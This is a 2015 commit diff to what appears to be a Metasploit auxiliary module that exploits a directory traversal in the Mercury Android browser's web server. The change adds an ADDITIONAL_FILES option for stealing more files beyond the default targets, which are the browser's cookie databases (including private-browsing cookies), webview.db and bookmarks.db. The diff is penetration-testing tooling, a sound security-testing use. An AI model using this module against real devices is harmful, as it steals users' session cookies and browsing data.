Add ADDITIONAL_FILES option

wchen-r7 · wchen-r7 · commit 08b5b8ebb2df · 2015-09-17T11:30:58.000-05:00
diff --git a/modules/auxiliary/server/android_mercury_parseuri.rb b/modules/auxiliary/server/android_mercury_parseuri.rb
@@ -19,6 +19,10 @@ def initialize(info = {})
         private wifi manager activity, which starts a web server for Mercury on port 8888.
         The webserver also suffers a directory traversal that allows remote access to
         sensitive files.
+
+        By default, this module will go after webviewCookiesChromium.db, webviewCookiesChromiumPrivate.db,
+        webview.db, and bookmarks.db. But if this isn't enough, you can also specify the
+        ADDITIONAL_FILES datastore option to collect more files.
       },
       'Author'         =>
         [
@@ -34,7 +38,10 @@ def initialize(info = {})
         ]
     ))
 
-
+    register_options(
+      [
+        OptString.new('ADDITIONAL_FILES', [false, 'Additional files to steal from the device'])
+      ], self.class)
   end
 
   def is_android?(user_agent)
@@ -98,12 +105,18 @@ def uxss
   end
 
   def file_urls
-    [
+    files = [
       '/data/data/com.ilegendsoft.mercury/databases/webviewCookiesChromium.db',
       '/data/data/com.ilegendsoft.mercury/databases/webviewCookiesChromiumPrivate.db',
       '/data/data/com.ilegendsoft.mercury/databases/webview.db',
       '/data/data/com.ilegendsoft.mercury/databases/bookmarks.db'
     ]
+
+    if datastore['ADDITIONAL_FILES']
+      files.concat(datastore['ADDITIONAL_FILES'].split)
+    end
+
+    files
   end
 
   def on_request_uri(cli, req)
